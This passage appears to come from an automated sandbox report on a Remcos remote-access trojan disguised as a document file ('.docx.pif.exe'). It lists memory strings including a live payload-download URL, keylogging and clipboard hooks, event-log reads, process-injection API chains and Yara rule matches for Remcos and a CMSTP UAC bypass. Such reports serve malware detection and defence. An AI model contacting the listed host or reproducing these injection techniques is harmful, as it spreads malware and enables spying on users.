              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: colorcpl.exeString found in binary or memory: http://geoplugin.net/json.gp
              Source: colorcpl.exe, 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
              Source: xkn.exe, 00000016.00000002.1319214441.000001EC81C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.0000000026652000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1392779821.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.00000000265F6000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.0000000027650000.00000004.00000020.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1335815868.0000000002326000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.00000000276AC000.00000004.00000020.00020000.00000000.sdmp, drbdmeyP.pif, drbdmeyP.pif, 00000003.00000001.1257794553.000000000043B000.00000040.00000001.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000000.1257373309.0000000000416000.00000002.00000001.01000000.00000005.sdmp, drbdmeyP.pif.0.drString found in binary or memory: http://www.pmail.com
              Source: xkn.exe, 00000016.00000002.1319214441.000001EC81CA1000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000016.00000002.1319214441.000001EC81C63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: SystemSettingsAdminFlows.exe, 00000028.00000002.3692868865.000002F388E38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localP
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.0000000000870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wcmanagers.com/
              Source: drbdmeyP.pif, 00000003.00000001.1257794553.00000000004CC000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://wcmanagers.com/Er9/233_Pyemdbrdpps
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wcmanagers.com/Er9/233_Pyemdbrdpps03
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.000000000087A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wcmanagers.com:443/Er9/233_PyemdbrdppsWz
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49700 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to register a low level keyboard hook
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458A2B8 SetWindowsHookExA 0000000D,0458A2A4,0000000031_2_0458A2B8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458B70E OpenClipboard,GetClipboardData,CloseClipboard,31_2_0458B70E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_045968C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,31_2_045968C1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458B70E OpenClipboard,GetClipboardData,CloseClipboard,31_2_0458B70E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0458A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,31_2_0458A3E0

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\gaban\logs.dat, type: DROPPED

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Contains functionalty to change the wallpaper
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0459C9E2 SystemParametersInfoW,31_2_0459C9E2
              Reads the Security eventlog
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
              Reads the System eventlog
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
              Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Windows\SysWOW64\colorcpl.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029981B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_029981B8
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299C7B4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0299C7B4
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299C724 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0299C724
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299A524 GetModuleHandleW,GetProcAddress,NtOpenProcess,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,NtWriteVirtualMemory,GetModuleHandleW,GetProcAddress,NtCreateThreadEx,CloseHandle,0_2_0299A524
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02997A94 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,0_2_02997A94
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299DA24 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,0_2_0299DA24
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299C898 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0299C898
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299D9A4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,0_2_0299D9A4
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02997944 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_02997944
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02997E14 LoadLibraryExA,GetModuleHandleA,GetProcAddress,NtFlushInstructionCache,FreeLibrary,0_2_02997E14
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02997CC8
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029981B6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_029981B6
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299C6AC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0299C6AC
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299C7B2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0299C7B2
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02997A92 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,0_2_02997A92
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_029979D8 GetModuleHandleW,GetProcAddress,NtProtectVirtualMemory,0_2_029979D8
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02997942 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_02997942
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,8_2_00007FF64B578114
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,8_2_00007FF64B58BCF0
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,8_2_00007FF64B5788C0
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,8_2_00007FF64B577FF8
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B57898C NtQueryInformationToken,8_2_00007FF64B57898C
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,8_2_00007FF64B563D94
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,8_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,8_2_00007FF64B5789E4
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,10_2_00007FF64B578114
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,10_2_00007FF64B58BCF0
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,10_2_00007FF64B5788C0
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,10_2_00007FF64B577FF8
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B57898C NtQueryInformationToken,10_2_00007FF64B57898C
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,10_2_00007FF64B563D94
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,10_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,10_2_00007FF64B5789E4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,12_2_00007FF64B578114
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,12_2_00007FF64B58BCF0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,12_2_00007FF64B5788C0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,12_2_00007FF64B577FF8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B57898C NtQueryInformationToken,12_2_00007FF64B57898C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,12_2_00007FF64B563D94
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,12_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,12_2_00007FF64B5789E4
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,14_2_00007FF64B578114
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,14_2_00007FF64B58BCF0
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,14_2_00007FF64B5788C0
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,14_2_00007FF64B577FF8
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B57898C NtQueryInformationToken,14_2_00007FF64B57898C
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,14_2_00007FF64B563D94
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,14_2_00007FF64B591538
              Source: C:\Users\Public\alpha.exeCode function: 14_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,14_2_00007FF64B5789E4
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,17_2_00007FF64B578114
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,17_2_00007FF64B58BCF0
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,17_2_00007FF64B5788C0
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,17_2_00007FF64B577FF8
              Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF64B57898C NtQueryInformationToken,17_2_00007FF64B57898C
